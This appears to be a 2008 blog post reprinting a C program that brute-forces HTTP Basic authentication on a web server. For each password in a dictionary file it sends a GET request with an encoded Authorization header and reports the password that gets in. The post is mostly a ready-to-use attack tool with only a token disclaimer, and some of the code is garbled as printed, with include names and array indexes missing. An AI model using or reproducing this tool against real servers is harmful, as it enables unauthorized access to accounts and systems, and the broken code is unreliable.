Tuesday, February 26, 2008

Brute Force into a Web Server. * * *

Brute Force into a Web Server. * * *
/ *
* Brute Force your way into a Web Server.
* -Works best on computers in the same subnet :-)
* In order to use this:
* 1) Get a dictionary file.
* 2) Compile this program, and run it. The arguments are-
* username dictfile hostname port
* << most websites have 'admin' as a user >>
* 3) Wait for user name and password to appear.
* NOTE: If you want to see the webserver's response,
* define VERBOSE when compiling.
* WARNING: If the webserver logs, it will
* be obvious that you are attacking!
* DISCLAIMER: Please use this program in a
* responsible manner.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern int errno;
/* Change this to whatever document you want to get off the web server */
#define DEFAULT_DOCUMENT "/"

char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
"0123456789+/";

unsigned char buf_64[512];
unsigned short socket_timeout=20;
char line[2048];

enum TOKENTYPE { NONE, BLANKS, PUNCT, TAG, NAME, CONTENT };

struct TOKEN {
char *text;
int length;
int index;
enum TOKENTYPE type;
};

struct BASE64_PARAMS {
unsigned long int accum;
int shift;
int save_shift;
};

int read_dict_file ( char *buff, FILE *f )
{
int b, i;
*buff = 0;
do {
while ((b = fgetc(f)) != EOF && (b == ' ' || b == '\t' || b == '\n' || b == '\r'));
if ( b == EOF ) return(0);
for ( i = 0; b != EOF && b != '\n' && b != '\r'; i++ )
{
buff = (b == '\t') ? ' ': b;
b = fgetc(f);
}
buff = 0;
}
while (*buff == '#');

return(1);
}

void (*
r_signal(sig, func, fd_socket, fd_accept)) (int)
int sig;
void (*func) ();
int fd_socket;
int fd_accept;
{
struct sigaction act, oact;

act.sa_handler = func;

sigemptyset(&act.sa_mask);
act.sa_flags = 0;
#ifdef SA_RESTART
act.sa_flags |= SA_RESTART;
#endif

if (sigaction(sig, &act, &oact) < 0)
return (SIG_ERR);

return (oact.sa_handler);
}
/* Read 'n' bytes from a descriptor */
int readn(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
{
int nleft, nread;

nleft=nbytes;
while(nleft > 0) {
nread=read(fd,ptr,nleft);
if (nread<0)
return(nread);
else if (nread==0)
break;

nleft -=nread;
ptr +=nread;
}
return(nbytes-nleft);
}

/* Write 'n' bytes to a descriptor */
int writen(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
{
int nleft, nwritten;

nleft=nbytes;
while(nleft > 0) {
nwritten=write(fd, ptr, nleft);
if(nwritten <= 0)
return(nwritten);

nleft -= nwritten;
ptr += nwritten;
}
return(nbytes-nleft);
}

char * dateTime()
{
time_t t;
char * s;

time(&t);
s = (char *)ctime((const time_t *)&t);
s[24] = '\0';
return s;
}
void handle_SIGSEGV (void)
{
fprintf(stderr, "\nSegmentation Violation! [%s]\n", dateTime());
exit(1);
}

void handle_SIGINT (void)
{
fprintf(stderr, "\nSignal Interrupt! [%s]\n", dateTime());
exit(1);
}


void sendln(int s, char buf[1024]) {
writen(s, buf, strlen(buf), 0);
}

int readln(int s)
{
int i,done=0,w, result;
char tmp[1];
struct timeval timeout;
fd_set inputs;

sprintf(line,"");
i = 0;

while (!done) {
FD_ZERO(&inputs);
FD_SET(s, &inputs);
timeout.tv_sec = socket_timeout;
timeout.tv_usec = 0;

result = select(FD_SETSIZE, &inputs,(fd_set *)0, (fd_set *)0,
&timeout);
switch(result) {
case 0:
printf("\n\nSocket Timeout\n");
exit(1);
break;
case -1:
perror("select");
exit(1);
break;
default:
w=readn(s ,tmp, 1);
break;
}
if (w==0) return 0;
if (tmp[0] != 0) {
line = tmp[0];
}
if (line == '\n') {
done = 1;
}
i++;
}
line = 0;
return (i);
}
/* Code to call out on a socket */
int call_socket(hostname, portnum)
char *hostname;
u_short portnum;
{
struct sockaddr_in sa;
struct hostent *hp;
int a, s, foo=1;

if ((hp= gethostbyname(hostname)) == NULL) { /* do we know the host's */
errno= ECONNREFUSED; /* address? */
return(-1); /* no */
}

bzero(&sa,sizeof(sa));
bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length); /* set address */
sa.sin_family= hp->h_addrtype;
sa.sin_port= htons((u_short)portnum);

if ((s= socket(hp->h_addrtype,SOCK_STREAM,0)) < 0) /* get socket */
return(-1);

#ifdef SOCKET_OPTS
/* set socket options so we can try multiple connects */
if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&foo, sizeof(foo)) ==-1) {
fprintf(stderr, "Error setting SO_REUSEADDR socket option in call_socket!\n");
fflush((FILE *)stderr);
exit(1);
}
#endif

if (connect(s,(struct sockaddr *)&sa,sizeof sa) < 0) { /* connect */
perror("connect failed");
exit(1);
}

return(s);
}

int base64_encode( int quit, struct BASE64_PARAMS *e_p,
char *string_to_encode )
{
int index;
unsigned long int value;
unsigned char blivit;
int z=0;

index = 0;
while ( ( *(string_to_encode+z) ) || (e_p->shift != 0) )
{
if ( ( *(string_to_encode+z) ) && ( quit == 0 ) )
{
blivit = *(string_to_encode +z);
z++;

if ( *(string_to_encode+z)==0 )
{
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
}
}
else
{
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
}
if ( (quit == 0) || (e_p->shift != 0) )
{
value = (unsigned long)blivit;
e_p->accum <<= 8;
e_p->shift += 8;
e_p->accum |= value;
} /* ENDIF */

while ( e_p->shift >= 6 )
{
e_p->shift -= 6;
value = (e_p->accum >> e_p->shift) & 0x3Fl;
blivit = alphabet[value];

buf_64[index++] = blivit;
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}

if ( quit != 0 )
{
e_p->shift = 0;
}
}
}

if ( e_p->save_shift == 2 )
{
buf_64[index++] = '=';
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}

buf_64[index++] = '=';
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}
}
else if ( e_p->save_shift == 4 )
{
buf_64[index++] = '=';
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}
}
if ( index != 0 )
{
/* buf_64[index-1]='='; */
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
}

return quit;
}

void encode_string (char *namepass)
{
struct BASE64_PARAMS e_p;
int quit=0;
register int i;
char * some;

e_p.shift = 0;
e_p.accum = 0;

some=(char *)malloc(256);

/* Nasty hack (forgive the lame coding...) */
some = (char *)namepass;
for (i=0;*(some+i);i++);
*(some+i)=*(some+i-1);
*(some+i+1)='\0';

base64_encode(quit, &e_p, (char *)some);
}


void sorry (void)
{
printf("\nSorry, but I could not get in.\n");
printf("There are two reasons why:\n");
printf("1) The user (argv[1]) does not exist on the webserver.\n");
printf("2) The user exists, but his/her passwd was not in your dict_file.\n");
printf("Have a Nice Day. :-)\n\n");
exit(0);
}

void usage(char *prog_name)
{
printf("\nUsage: ");
printf("[%s] username dictfile hostname port\n", prog_name);
printf("\n");
exit(0);
}

int main ( argc, argv )
unsigned int argc;
char **argv;
{

FILE * dict_fd=NULL;
struct hostent *hp;
unsigned short web_port=0;
int sock_fd=0;
char * dict_word=NULL;
char export_buff[1024];
char * encoded_buffer=NULL;
unsigned short finish_flag=1, success=0;
int foo;
if ( argc !=5 )
usage(argv[0]);

r_signal(SIGSEGV, handle_SIGSEGV);
r_signal(SIGINT, handle_SIGINT);

dict_word= (char *)malloc (256);

if ((dict_fd=fopen(argv[2], "r"))==NULL ) {
fprintf(stderr, "\nCould not open dictionary file: [%s]\n%s\n\n",
argv[2], strerror(errno));
exit(1);
}

if ((hp=(struct hostent *)gethostbyname((char *)argv[3])) == NULL) {
fprintf(stderr, "\nCould not resolve hostname: [%s]\n\n", argv[3]);
exit(1);
}

web_port = atoi(argv[4]);

encoded_buffer=(char *)malloc(512);

while (read_dict_file(dict_word, dict_fd)) {
if ((sock_fd=call_socket(argv[3], web_port))==-1) {
perror("socket connection");
exit(1);
}

#ifndef SOLARIS
if ((foo=ioctl(sock_fd, FIONBIO , 1))==-1) {
perror("ioctl");
exit(1);
}
#else
if ((foo=fcntl(sock_fd, O_NDELAY, 1)) <0) {
perror("ioctl");
exit(1);
}

#endif
sprintf(export_buff, "GET / HTTP/1.0\n");
sendln(sock_fd, export_buff);

sprintf(encoded_buffer, "%s:%s", argv[1], dict_word);
encode_string(encoded_buffer);
sprintf(export_buff, "Authorization: Basic %s\n\n", buf_64);
sendln(sock_fd, export_buff);

memset(line, '\0', sizeof(line));
while( readln(sock_fd)) {

#ifdef VERBOSE
printf("%s", line);
fflush((FILE *)stdout);
#endif

/* Change this to a more sophisticated test. */
/* This test is pretty lame, but works for */
/* all practical purposes. */
if (strstr(line, "nauthorized"))
finish_flag=0;
}

if (finish_flag) {
close(sock_fd);
finish_flag=1;
success=1;
break;
}

finish_flag=1;
close(sock_fd);

}

fclose(dict_fd);
if (!success)
sorry();
else {
printf("\n\nThe UserName is: %s\n", argv[1]);
printf("The Password is: %s\n", dict_word);
printf("\n\n\n ---- Coded by BeastMaster V ----\n");
exit(0);
}

}